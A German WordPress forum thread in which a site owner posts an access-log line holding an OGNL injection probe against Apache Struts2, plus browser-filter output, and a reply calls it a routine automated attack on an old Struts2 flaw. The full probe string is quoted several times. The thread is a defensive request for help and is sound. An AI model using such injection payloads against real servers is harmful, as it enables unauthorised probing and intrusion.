1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Was ist das für eine Attacke auf WP ?

Dieses Thema im Forum "Plauderboard" wurde erstellt von fercher, 1. Juli 2017.

  1. fercher

    fercher Member

    Registriert seit:
    16. Januar 2005
    Beiträge:
    16
    Zustimmungen:
    0
    Heute im Logfile gefunden:
    mein_wp/category/salzburg/?redirect:$%7B%23matt%3d%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.setContentType('text/plain'),%23matt.getWriter().println%20('successsucce

    Folgende Website dazu gefunden:
    http://ddecode.com/hexdecoder/?results=b7e8412cdad2ad13ba538ef8f8365474

    Was ist das für ein Angriff bzw. Angriffs-Versuch ?

    Bitte um / thx vorab für zielführende Hinweise.
    Josef
     
  2. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    Poste mal den kompletten Logauszug
     
  3. fercher

    fercher Member

    Registriert seit:
    16. Januar 2005
    Beiträge:
    16
    Zustimmungen:
    0
    119.28.67.89 - - [01/Jul/2017:13:08:48 +0200]
    "GET /category/salzburg/?redirect:$%7B%23matt%3d%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.setContentType('text/plain'),%23matt.getWriter().println%20('successsuccess'),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.1"
    200 77641 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0"


    Hille, thx für die Rückmeldung.

    Oben ist der Logfile-Eintrag, zur besseren Übersicht hier aufgeteilt in mehrere Zeilen.
    Der Code 200 am Anfang der letzten Zeile sagt: Seite erreicht.


    Wenn ich den Query-String ab ?redirect in das Suchfeld von trojaner-board.de eingebe, kommt die Meldung:

    about:blank : Unable to run script because scripts are blocked internally. (unbekannt)
    [NoScript InjectionChecker] JavaScript Injection in ///cse?cx=partner-pub-0879914387367977:4sv7c8wzsx0&ie=ISO-8859-1&q=?redirect:${#matt= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.setContentType('text/plain'),#matt.getWriter().println ('successsuccess'),#matt.getWriter().flush(),#matt.getWriter().close()} HTTP/1.1"&sa=Suche
    (function anonymous(
    ) {
    context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'), /* COMMENT_TERMINATOR */
    DUMMY_EXPR
    })
    [NoScript XSS] Eine verdächtige Anfrage wurde bereinigt. Original-URL [http://www.google.de/cse?cx=partner-pub-0879914387367977%3A4sv7c8wzsx0&ie=ISO-8859-1&q=%3Fredirect%3A%24%257B%2523matt%253d%2520%2523context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%2523matt.setContentType%28%27text%2Fplain%27%29%2C%2523matt.getWriter%28%29.println%2520%28%27successsuccess%27%29%2C%2523matt.getWriter%28%29.flush%28%29%2C%2523matt.getWriter%28%29.close%28%29%257D+HTTP%2F1.1%22&sa=Suche] angefordert von [http://www.trojaner-board.de/]. Bereinigte URL: [http://www.google.de/cse?cx=partner-pub-0879914387367977%3A4sv7c8wzsx0&ie=ISO-8859-1&q=%3Fredirect%3A%24%7B%23matt%20%20%23context.get%20%20com.opensymphony.xwork2.dispatcher.HttpServletResponse%20%20%2C%23matt.setContentType%20%20text/plain%20%20%2C%23matt.getWriter%20%20.println%20%20%20successsuccess%20%20%2C%23matt.getWriter%20%20.flush%20%20%2C%23matt.getWriter%20%20.close%20%20%7D+HTTP/1.1%20&sa=Suche#86428359747811736].
    Gemischte (unsichere) Anzeige-Inhalte von "http://www.trojaner-board.de/1.jpg" werden auf einer sicheren Seite geladen[Weitere Informationen] cse
    about:blank : Unable to run script because scripts are blocked internally. (unbekannt)
    about:blank : Unable to run script because scripts are blocked internally.


    Ich habe in meiner WP-Kategorie "Salzburg" via phpMyAdmin einige Einträge angeschaut, aber nichts Auffälliges gefunden.


    Gruss
    Josef
     
  4. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    11.634
    Zustimmungen:
    1.778
    Das war ein tagtäglich erfolgender automatisierter versuchter Angriff auf eine einige Jahre alte Lücke in struts2, mehr dazu hier.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden